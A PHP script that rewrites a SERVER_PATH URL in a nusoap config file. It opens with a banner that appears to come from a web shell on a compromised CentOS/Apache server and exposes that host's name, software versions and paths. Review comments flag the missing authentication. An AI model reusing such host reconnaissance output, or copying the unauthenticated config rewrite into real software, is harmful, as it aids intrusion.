Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/ums/ drwxr-xr-x |
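<?php
/**
 * Rewrites the $GLOBALS["SERVER_PATH"] assignment inside
 * lib/nusoap/globalversion.php so that it points at
 * http://<host>/mis/version/admin/send.php, then sends the browser back to
 * updateFile.php.
 *
 * Inputs read from the global scope: $method ("addpath" or "editpath"),
 * $server_path and $new_path. None of them is assigned in this file.
 *
 * NOTE(review): no authentication or authorisation check is visible in this
 * file, and the inputs arrive from outside it (presumably request variables
 * or an including script - confirm). Whoever can set them decides which URL
 * ends up in SERVER_PATH, so the caller must restrict this page to
 * administrators.
 */

/**
 * Replace the file at $fpath with $defaultval.
 *
 * @param string $fpath      Path of the file to (re)create.
 * @param string $defaultval Complete new content of the file.
 * @return bool True only when every byte was written.
 */
function update_file($fpath, $defaultval)
{
    $retval = false;
    $data = (string) $defaultval;

    // The existing copy is removed before the new one is opened, as before.
    // NOTE(review): this is not atomic - if the open or the write below
    // fails, the previous file is already gone.
    if (file_exists($fpath)) {
        unlink($fpath);
    }

    $handle = fopen($fpath, "wb");
    if ($handle) {
        $written = fwrite($handle, $data);
        fclose($handle);
        // A short write would leave a truncated PHP file behind, so it is
        // reported as a failure instead of a success.
        $retval = ($written !== false && $written === strlen($data));
    }

    return $retval;
}

/**
 * Check that the current working directory accepts new files by creating and
 * deleting a probe file named testwrite_<timestamp>.txt.
 *
 * @return bool True when the probe file could be created.
 */
function folder_writable()
{
    $retval = false;
    $file_name = "testwrite_" . time() . ".txt";

    $handle = fopen($file_name, "wb");
    if ($handle) {
        $retval = true;
        fclose($handle);
        unlink($file_name);
    }

    return $retval;
}

/**
 * Escape a value so it can sit inside a double-quoted PHP string literal
 * without ending the literal or being parsed as a variable.
 *
 * @param string $value Raw value.
 * @return string Value with backslash, double quote and dollar sign escaped.
 */
function escape_php_string_value($value)
{
    return addcslashes($value, '\\"$');
}

/**
 * Escape a value for use in the replacement argument of preg_replace(), where
 * "$n" and "\n" would otherwise be read as group references.
 *
 * @param string $value Text that must be inserted literally.
 * @return string Value with backslash and dollar sign escaped.
 */
function escape_preg_replacement($value)
{
    return addcslashes($value, '\\$');
}

$save_file = 'lib/nusoap/globalversion.php';

// Shown whenever the path could not be changed ("Unable to edit the machine name").
$fail_html = "<div align=\"center\">ไม่สามารถแก้ไขชื่อเครื่องได้</div>";

// Normalise the externally supplied values; a missing one becomes an empty string.
$method = isset($method) ? (string) $method : '';
$server_path = isset($server_path) ? (string) $server_path : '';
$new_path = isset($new_path) ? (string) $new_path : '';

$server_path = "http://" . $server_path . "/mis/version/admin/send.php";
$new_path = "http://" . $new_path . "/mis/version/admin/send.php";
if ($method == "editpath") {
    $server_path = $new_path;
}

if (folder_writable()) {
    // An unreadable or missing config file is treated like "assignment not found".
    $content = is_readable($save_file) ? file_get_contents($save_file) : false;
    if ($content === false) {
        echo $fail_html;
        exit;
    }

    // Control characters have no place in a URL. A line break would also split
    // the assignment over two lines, and the pattern below could then no longer
    // find it on a later run.
    if (preg_match('/[\x00-\x1F\x7F]/', $server_path)) {
        echo $fail_html;
        exit;
    }

    // Matches: $GLOBALS["SERVER_PATH"] = "<anything>";
    $pattern = '/(\$GLOBALS\["SERVER_PATH"\]\s=\s)(")(.*)(")(;)/';

    if (preg_match($pattern, $content)) {
        // The value becomes part of PHP source code. It is escaped first for
        // the double-quoted literal it is written into and then for
        // preg_replace(), so it stays data in the generated file whatever
        // characters it contains.
        $literal = escape_php_string_value($server_path);
        $replacement = '${1}${2}' . escape_preg_replacement($literal) . '${4}${5}';
        $newcontent = preg_replace($pattern, $replacement, $content);

        // preg_replace() returns null on a PCRE error; never write that out.
        if ($newcontent !== null && update_file($save_file, $newcontent) == true) {
            if ($method == "addpath") {
                echo "<meta http-equiv='refresh' content='0; URL=updateFile.php'>";
            } else if ($method == "editpath") {
                ?>
<script language="javascript1.2"> window.close(); window.opener.location.href="updateFile.php"; </script>
                <?php
            }
        } else {
            echo $fail_html;
            exit;
        }
    } else {
        // No SERVER_PATH assignment found in the file.
        echo $fail_html;
        exit;
    }
} else {
    echo "<div align=\"center\">".getcwd() . " cannot writable!</div>";
    exit;
}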